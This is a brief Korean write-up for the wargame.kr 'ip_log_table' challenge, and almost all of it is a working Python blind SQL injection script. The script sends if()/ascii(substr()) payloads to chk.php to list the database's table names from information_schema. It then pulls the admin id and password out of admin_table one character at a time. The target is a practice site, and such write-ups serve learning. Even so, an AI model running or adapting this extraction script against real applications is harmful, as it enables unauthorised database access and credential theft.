[wargame.kr]ip_log_table

ip log table을 누르면 나오는 페이지를 이용해서 blind sql injection 하면 된다. if문을 이용했다.

import http.client
import string
from urllib import parse
import time
def blind(q):
	con=http.client.HTTPConnection('wargame.kr:8080')
	head={'Content-type': 'application/x-www-form-urlencoded','Accept': 'text/plain','Cookie':XXXX}
	params=parse.urlencode({'idx':q})
	con.request('POST','/ip_log_table/chk.php',params,headers=head)
	res=con.getresponse().read()
	#print(res)
	return b'2017' in res
char='~!@#$%^&*()-,.[]_0123456789'+string.ascii_letters

def table_find():
	ans=''
	for c in range(1,2):
		for i in range(1,12):
			for j in char:
				#print(ans)
				q='if((select ascii(substr(table_name,{},1)) from information_schema.tables where table_type=0x62617365207461626c65 limit {},1)={},17122,0)'.format(i,c,ord(j))
				if blind(q):
					ans+=j
					print('[*]find '+ans)
					break
		print('[**]table_name '+ans)
		ans=''

def idps_find(obj):
	ans=''
	for i in range(1,10):
		for j in char:
			#print(ans)
			q='if((select ascii(substr({},{},1)) from admin_table)={},17122,0)'.format(obj,i,ord(j))
			#print(q)
			if blind(q):
				ans+=j
				print('[*]find '+ans)
				break
	print('[**]'+obj+' '+ans)

#table 갯수=2
#if((select length(table_name) from information_schema.tables where table_type=0x62617365207461626c65 limit 2,1)>0,17122,0)
#first table length=11, second table length=8
table_find()
#table_name 1 : admin_table, ip_table
#admin_table id length = 10, ps length=10
idps_find('id')
idps_find('ps')